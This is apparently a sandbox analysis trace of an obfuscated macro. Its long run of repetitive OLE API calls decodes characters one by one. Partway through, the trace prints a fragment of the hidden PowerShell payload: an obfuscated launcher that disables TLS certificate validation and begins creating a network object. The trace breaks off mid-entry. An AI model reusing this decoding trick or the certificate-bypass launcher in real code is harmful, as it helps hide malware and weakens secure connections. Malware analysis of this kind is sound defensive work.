[0047.232] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.233] GetUserDefaultLCID () returned 0x409 [0047.233] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.233] GetUserDefaultLCID () returned 0x409 [0047.233] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.233] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.234] GetUserDefaultLCID () returned 0x409 [0047.234] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.234] GetUserDefaultLCID () returned 0x409 [0047.234] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.234] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.235] GetUserDefaultLCID () returned 0x409 [0047.235] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.235] GetUserDefaultLCID () returned 0x409 [0047.235] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.235] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.236] GetUserDefaultLCID () returned 0x409 [0047.236] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.237] GetUserDefaultLCID () returned 0x409 [0047.237] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.237] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.238] GetUserDefaultLCID () returned 0x409 [0047.238] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.238] GetUserDefaultLCID () returned 0x409 [0047.238] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.238] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.239] GetUserDefaultLCID () returned 0x409 [0047.239] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.239] GetUserDefaultLCID () returned 0x409 [0047.239] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.239] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.240] GetUserDefaultLCID () returned 0x409 [0047.240] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.240] GetUserDefaultLCID () returned 0x409 [0047.240] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.240] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.241] GetUserDefaultLCID () returned 0x409 [0047.241] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.242] GetUserDefaultLCID () returned 0x409 [0047.242] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.242] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.243] GetUserDefaultLCID () returned 0x409 [0047.243] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.243] GetUserDefaultLCID () returned 0x409 [0047.243] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.243] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.244] GetUserDefaultLCID () returned 0x409 [0047.244] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.244] GetUserDefaultLCID () returned 0x409 [0047.244] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.244] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.245] GetUserDefaultLCID () returned 0x409 [0047.245] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.245] GetUserDefaultLCID () returned 0x409 [0047.245] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.245] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.247] GetUserDefaultLCID () returned 0x409 [0047.247] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.247] GetUserDefaultLCID () returned 0x409 [0047.247] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.247] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.248] GetUserDefaultLCID () returned 0x409 [0047.248] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.248] GetUserDefaultLCID () returned 0x409 [0047.248] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.248] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.248] VarBstrCat (in: bstrLeft="powershell.exe \"<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{[System.Net.ServicePointM", bstrRight="anager]::ServerCertificateValidationCallback = { $true }; (new-o", pbstrResult=0x205f70 | out: pbstrResult=0x205f70) returned 0x0 [0047.250] GetUserDefaultLCID () returned 0x409 [0047.250] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\x01܈") returned 0x0 [0047.250] GetUserDefaultLCID () returned 0x409 [0047.251] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.251] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.252] GetUserDefaultLCID () returned 0x409 [0047.252] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.252] GetUserDefaultLCID () returned 0x409 [0047.252] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.252] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.253] GetUserDefaultLCID () returned 0x409 [0047.253] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.253] GetUserDefaultLCID () returned 0x409 [0047.253] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.253] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.254] GetUserDefaultLCID () returned 0x409 [0047.254] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.254] GetUserDefaultLCID () returned 0x409 [0047.254] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.254] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.255] GetUserDefaultLCID () returned 0x409 [0047.255] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.255] GetUserDefaultLCID () returned 0x409 [0047.255] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.255] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.256] GetUserDefaultLCID () returned 0x409 [0047.256] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.256] GetUserDefaultLCID () returned 0x409 [0047.256] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.256] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.257] GetUserDefaultLCID () returned 0x409 [0047.257] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.258] GetUserDefaultLCID () returned 0x409 [0047.258] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.258] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.259] GetUserDefaultLCID () returned 0x409 [0047.259] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.259] GetUserDefaultLCID () returned 0x409 [0047.259] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.259] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.260] GetUserDefaultLCID () returned 0x409 [0047.260] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.260] GetUserDefaultLCID () returned 0x409 [0047.260] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.260] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.261] GetUserDefaultLCID () returned 0x409 [0047.261] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.261] GetUserDefaultLCID () returned 0x409 [0047.261] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.261] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.263] GetUserDefaultLCID () returned 0x409 [0047.263] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.263] GetUserDefaultLCID () returned 0x409 [0047.263] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.263] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.265] GetUserDefaultLCID () returned 0x409 [0047.265] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.265] GetUserDefaultLCID () returned 0x409 [0047.265] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.265] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.266] GetUserDefaultLCID () returned 0x409 [0047.266] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.266] GetUserDefaultLCID () returned 0x409 [0047.266] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.266] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.267] GetUserDefaultLCID () returned 0x409 [0047.268] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.268] GetUserDefaultLCID () returned 0x409 [0047.268] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.268] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.269] GetUserDefaultLCID () returned 0x409 [0047.269] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.269] GetUserDefaultLCID () returned 0x409 [0047.269] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.269] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.270] GetUserDefaultLCID () returned 0x409 [0047.270] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.270] GetUserDefaultLCID () returned 0x409 [0047.270] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.270] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.271] GetUserDefaultLCID () returned 0x409 [0047.271] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.271] GetUserDefaultLCID () returned 0x409 [0047.271] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.272] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.273] GetUserDefaultLCID () returned 0x409 [0047.273] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.273] GetUserDefaultLCID () returned 0x409 [0047.273] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.273] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.274] GetUserDefaultLCID () returned 0x409 [0047.274] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.274] GetUserDefaultLCID () returned 0x409 [0047.274] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.274] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.275] GetUserDefaultLCID () returned 0x409 [0047.275] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.275] GetUserDefaultLCID () returned 0x409 [0047.275] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.275] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.276] GetUserDefaultLCID () returned 0x409 [0047.276] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.276] GetUserDefaultLCID () returned 0x409 [0047.276] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.277] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.278] GetUserDefaultLCID () returned 0x409 [0047.278] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.278] GetUserDefaultLCID () returned 0x409 [0047.278] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.278] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.279] GetUserDefaultLCID () returned 0x409 [0047.279] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.279] GetUserDefaultLCID () returned 0x409 [0047.279] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.279] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.280] GetUserDefaultLCID () returned 0x409 [0047.280] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.280] GetUserDefaultLCID () returned 0x409 [0047.280] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.280] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.281] GetUserDefaultLCID () returned 0x409 [0047.281] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.282] GetUserDefaultLCID () returned 0x409 [0047.282] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.282] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.283] GetUserDefaultLCID () returned 0x409 [0047.283] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.283] GetUserDefaultLCID () returned 0x409 [0047.283] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.283] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.284] GetUserDefaultLCID () returned 0x409 [0047.284] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.284] GetUserDefaultLCID () returned 0x409 [0047.284] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.284] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.285] GetUserDefaultLCID () returned 0x409 [0047.285] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.285] GetUserDefaultLCID () returned 0x409 [0047.285] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.285] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.286] GetUserDefaultLCID () returned 0x409 [0047.286] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.287] GetUserDefaultLCID () returned 0x409 [0047.287] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.287] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.288] GetUserDefaultLCID () returned 0x409 [0047.288] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.288] GetUserDefaultLCID () returned 0x409 [0047.288] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.288] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.289] GetUserDefaultLCID () returned 0x409 [0047.289] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.289] GetUserDefaultLCID () returned 0x409 [0047.289] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.289] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.290] GetUserDefaultLCID () returned 0x409 [0047.290] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.290] GetUserDefaultLCID () returned 0x409 [0047.291] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.291] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.292] GetUserDefaultLCID () returned 0x409 [0047.292] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.292] GetUserDefaultLCID () returned 0x409 [0047.292] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.292] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.293] GetUserDefaultLCID () returned 0x409 [0047.293] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.293] GetUserDefaultLCID () returned 0x409 [0047.293] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.293] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.294] GetUserDefaultLCID () returned 0x409 [0047.294] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.294] GetUserDefaultLCID () returned 0x409 [0047.294] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.294] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.295] GetUserDefaultLCID () returned 0x409 [0047.295] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.295] GetUserDefaultLCID () returned 0x409 [0047.296] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.296] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.296] GetUserDefaultLCID () returned 0x409 [0047.296] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.297] GetUserDefaultLCID () returned 0x409 [0047.297] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.297] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.297] GetUserDefaultLCID () returned 0x409 [0047.297] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.297] GetUserDefaultLCID () returned 0x409 [0047.297] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.297] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.298] GetUserDefaultLCID () returned 0x409 [0047.298] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.298] GetUserDefaultLCID () returned 0x409 [0047.298] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.298] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.300] GetUserDefaultLCID () returned 0x409 [0047.300] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.300] GetUserDefaultLCID () returned 0x409 [0047.300] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.300] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.301] GetUserDefaultLCID () returned 0x409 [0047.301] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.301] GetUserDefaultLCID () returned 0x409 [0047.301] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.301] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.302] GetUserDefaultLCID () returned 0x409 [0047.302] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.302] GetUserDefaultLCID () returned 0x409 [0047.303] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.303] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.304] GetUserDefaultLCID () returned 0x409 [0047.304] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.304] GetUserDefaultLCID () returned 0x409 [0047.304] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, 